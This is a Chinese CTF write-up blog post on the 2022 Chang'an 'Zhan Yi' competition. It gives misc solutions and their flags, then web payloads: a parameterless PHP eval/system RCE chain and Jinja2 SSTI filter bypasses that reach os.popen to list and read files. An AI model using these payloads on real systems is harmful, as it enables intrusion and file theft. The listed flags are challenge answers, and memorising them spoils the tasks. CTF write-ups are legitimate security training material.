长安“战疫”网络安全卫士守护赛writeup

最新推荐文章于 2023-03-14 09:01:15 发布
最新推荐文章于 2023-03-14 09:01:15 发布
阅读量4.1k 收藏 2
点赞数 3
文章标签: web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53460654/article/details/122394846
版权

长安“战疫”网络安全卫士守护赛writeup

misc

八卦迷宫

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-8NUJnLYi-1641715550914)(C:\Users\M1keal\AppData\Roaming\Typora\typora-user-images\image-20220108124601892.png)]

得到flag

cazy{zhanchangyangchangzhanyanghechangshanshananzhanyiyizhanyianyichanganyang}

西安加油

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xJv5KOma-1641715550914)(C:\Users\M1keal\AppData\Roaming\Typora\typora-user-images\image-20220108174108640.png)]

tcp流里面找到base64编码

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-lLtp2XPH-1641715550915)(C:\Users\M1keal\AppData\Roaming\Typora\typora-user-images\image-20220108174037547.png)]

在线转为zip解压

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-UbVG3RR6-1641715550916)(C:\Users\M1keal\AppData\Roaming\Typora\typora-user-images\image-20220108174142276.png)]

拼图得到flag

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xqpuvdk0-1641715550918)(C:\Users\M1keal\AppData\Roaming\Typora\typora-user-images\image-20220108174221827.png)]

cazy{make_XiAN_great_Again}

web

RCE_No_Para
<?php
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { 
  if(!preg_match('![img](file:///C:\Users\M1keal\AppData\Roaming\Tencent\QQTempSys\V7(XMWRN]{G8~CI}BCCR3QC.gif)ssion|end|next|header|dir/i',$_GET['code'])){
    eval($_GET['code']);
  }else{
    die("Hacker!");
  }
}else{
  show_source(__FILE__);
}
?>

参考链接

PHP Parametric Function RCE · sky’s blog (skysec.top)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VMhSM5Wb-1641715550919)(C:\Users\M1keal\AppData\Roaming\Typora\typora-user-images\image-20220108134940618.png)]

所以paylaod:

?m1kael=system(“cat%20/var/www/html/flag.php”);&code=eval(current(current(get_defined_vars())));

Flask

根据提示

admin?name=payload?1.js?

然后过滤了[]和_

参考链接

以 Bypass 为中心谭谈 Flask-jinja2 SSTI 的利用 - 先知社区 (aliyun.com)

所以payload:

{%print(lipsum|attr(%22\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f%22))|attr(%22\u005f\u005f\u0067\u0065\u0074\u0069\u0074\u0065\u006d\u005f\u005f%22)(%22os%22)|attr(%22popen%22)(%22ls /%22)|attr(%22read%22)()%}

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-IaKr1Yp7-1641715550919)(C:\Users\M1keal\AppData\Roaming\Typora\typora-user-images\image-20220108144609879.png)]

然后

{%print(lipsum|attr("\u005f\u005f\u0067\u006c\u006f\u0062\u0061\u006c\u0073\u005f\u005f"))|attr("\u005f\u005f\u0067\u0065\u0074\u0069\u0074\u0065\u006d\u005f\u005f")("os")|attr("popen")("cat%20/f*")|attr("read")()%}%20.js?

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5Suv667b-1641715550920)(C:\Users\M1keal\AppData\Roaming\Typora\typora-user-images\image-20220108145645686.png)]

Flag配送中心

CVE-2016-5385

vulhub漏洞复现 · Ywc’s blog (yinwc.github.io)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-N2RNwTfY-1641715550920)(C:\Users\M1keal\AppData\Roaming\Typora\typora-user-images\image-20220108163206016.png)]
在这里插入图片描述

M1kael
关注
长安战疫网络安全卫士守护部分writeup
weixin_52829570的博客
01-08 1816
解题过程 题目一 八卦迷宫 用画图工具手工连接,然后将路上的图表和字相对应 按顺序打出,然后根据题目要求换成全拼,加上图片里的前缀cazy{}提交 flag为: cazy{zhanchangyangchangzhanyanghechangshanshananzhanyiyizhanyianyichanganyang} 题目二 西安加油 用wireshark打开发现一个很大而且带有很多base64编码的流量 追踪http流,复制去解base64,得到一个zip 解压得
2024 高校网络安全管理运维 -实践能力Writeup(web-2部分解析)
weixin_39435784的博客
05-09 1587
2024 高校网络安全管理运维 -实践能力Writeup(web-2部分解析)
长安战“疫”--flask
qq_46263951的博客
01-11 239
当时都被重定向搞崩溃了,,, 还是自己太菜了,没想到用参数值来绕过 先看注释 大致意思是访问路径以/login开头或者是以.js结尾 查看/static.js本以为有提示,结果啥也没有,那答案一定是在/admin中request.full_path获取当前url,(包含参数) 请求一个http://127.0.0.1:8000/200/?type=10 request.get_full_path()返回的是【/200/?type=10】 访问/admin,得到一个参数name 这里不知道都.
长安战疫 flask
weixin_45751765的博客
01-25 825
0x00 前言 补充flask基础知识 贴文档 request.full_path Requested path as unicode, including the query string. 包含查询字符串的请求路径 直观一点 0x01 复现 注释带hint <div class="center-content error"> <h3>you need login</h3> <!--/admin--&g
长安战疫网络安全卫士守护 WriteUp
as you know, nlp is fantasitc!
01-09 2788
长安守护 1、RCE_No_Para 参考一篇比较详细的bloghttps://skysec.top/2019/03/29/PHP-Parametric-Function-RCE/#%E6%B3%951%EF%BC%9Agetenv 源码 <?php if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { if(!preg_match('/session|end|next|header|dir
2021强网杯全国网络安全挑战Writeup
道阻且长,行则将至。
06-20 7690
文章目录前言强网先锋-赌徒PHP的魔术方法题目POP链构造强网先锋-寻宝Key1之代码审计Key2之脚本搜索 前言 上周末端午假期期间(6月12日9:00至6月13日21:00)参与了为期 36h 的第五届强网杯网络安全,不得不说题目比去年难多了,两天下来腰酸背痛脑壳疼……比的数据大致如下: 幸运的是最终在实力傍队友的情况下,又一年获得竞前 10% 有效排名的 “强网先锋” 称号,在此记录下比Writeup。 强网先锋-赌徒 1、下发题,访问地址如下: 2、结合题目源码提醒,利用 dir
长安战疫网络安全卫士守护Writeup
末初的CSDN博客
01-08 4118
长安战疫Writeup
第四届红帽杯网络安全大赛-线上Writeup1
08-03
第四届红帽杯络安全-线上Writeup 第四届红帽杯络安全 - 线上 Writeup 第四届红帽杯络安全-线上Writeup 第四届红帽杯络安全-
2024 高校网络安全管理运维 Writeup.pdf
05-16
2024 高校网络安全管理运维 Writeup.pdf
2024年第十七届全国大学生信息安全创新实践能力部分Writeup
最新发布
05-27
2024年第十七届全国大学生信息安全创新实践能力部分Writeup解析部分题目
2022 长安战疫网络安全卫士守护 WriteUp
热门推荐
mumuzi的博客
01-08 1万+
2022 长安战疫部分wp
[青少年CTF]-MISC WP(一)
qq_45524026的博客
03-14 2145
[青少年CTF]-MISC WP(一)
第二届长城杯
247533的博客
08-23 591
一血!!!
长安战疫网络安全Writeup
Le1a's Blog
01-12 3933
Web RCE_No_Para 无参RCE ?1=system('tac flag.php');&code=eval(current(current(get_defined_vars()))); flask admin?static.js? 然后发现传参点:?name= 简单试了下SSTI,发现过滤了引号等符号 考虑attr结合16进制来绕过 {{a|attr(%27\x5f\x5f\x63\x6c\x61\x73\x73\x5f\x5f%27)|attr(%27\x5f\x5f\x62\x6
第一届长城杯 部分WP
mumuzi的博客
09-19 2668
平台没交WP,一是19名肯定进不了,二是步骤多懒得写,三是队里的密码????赶高铁去了。 签到 16进制的ascii+base64,手速是吧,直接一血。 flag{Welcome_to_changchengbe1} 你这flag保熟吗 前面不说了,两张图片尾部都有rar,提取出来一个hint和一个password的表格,hint给了16位的base64,加密之后和表格比较,发现 哦~,原来是希尔伯特曲线 观察和写脚本经历了长达1个多小时的斗争。 用希尔伯特曲线来提取此表格的脚本如下。(根据百度) fr
web入门--ssti
whisper921的博客
04-16 2737
web361 注入点是?name。 ?name={{''.__class__.__mro__[1].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}} 利用的是os._wrap_close类 得到flag ctfshow{77ca18dd-38c5-4a9c-a735-522a8af345c9} web362 可以用以下已有的函数,去得到__builtins__,然后用eval就可以了:
细说Jinja2之SSTI&bypass
蚁景网安学院
12-18 3543
亲爱的,关注我吧12/18本文字数10061来和我一起阅读吧前言SSTI(Server-Side Template Injection)服务端模板注入在CTF中并不是一个新颖的考点了,之...
无参数读文件和RCE
..
01-08 631
题目背景:长安战疫杯的RCE_No_Para 代码解析: preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code']) preg_replace是执行正则搜索,如果搜索到则替换为空。 \W是匹配非数字、字母、下划线,[^\W]则是非\W的东西,即数字、字母、下划线,相当于小写的\w。 正则表达式 – 元字符 | 菜鸟教程 然后难点是(?R)?,意思为递归整个匹配模式。 举个例子: a() #递归零次 a...
长安战疫网络安全-wp
qq_45603443的博客
01-11 5901
长安战疫网络安全-wpWebtpshiro?Baby_Uploadflag配送中心flaskRCE_No_ParaCryptono_can_no_bbmathLinearEquationsno_mah_no_cryno_cry_no_canMiscez_Encryptbinary西安加油Ez Steg八卦迷宫无字天书朴实无华的取证Reverselemoncombat_slogancute_dogehello_pyPwnpwn1重点来了 Web tp 文件上传+phar反序列化 <?php nam
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

M1kael

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值